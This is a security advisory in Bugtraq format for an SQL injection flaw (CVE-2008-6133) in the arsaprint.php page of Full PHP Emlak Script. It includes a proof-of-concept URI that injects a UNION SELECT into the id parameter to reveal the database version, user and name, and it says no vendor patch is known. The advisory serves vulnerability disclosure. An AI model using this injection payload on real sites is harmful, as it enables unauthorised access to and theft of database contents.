Full PHP Emlak Script 'arsaprint.php' SQL Injection Vulnerability
-\\Bugtraq ID:
31558
-\\Class:
Input Validation Error
-\\CVE:
CVE-2008-6133
-\\Remote:
Yes
-\\Local:
No
-\\Published:
Oct 03 2008 12:00AM
-\\Updated:
Feb 21 2009 05:57PM
-\\Credit:
Hussin X
-\\Vulnerable:
Ozsari Grup Full PHP Emlak Script 0
-\\Discussion
Full PHP Emlak Script is prone to an SQL-injection vulnerability because it fails to properly sanitize user-supplied input.
Attackers may exploit this issue to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
-\\Exploit(s)/PoC(s):
An attacker can exploit this issue via a browser.
The following example URI is available:
http://www.example.com/Script/arsaprint.php?id=-9+union+select+version(),2,3,user(),database(),version(),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77--
-\\Solution
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at:
This e-mail address is being protected from spambots. You need JavaScript enabled to view it
.
-\\References(s)
--Ozsari Grup Homepage
http://ozsarigrup.com (Ozsari Grup)
|
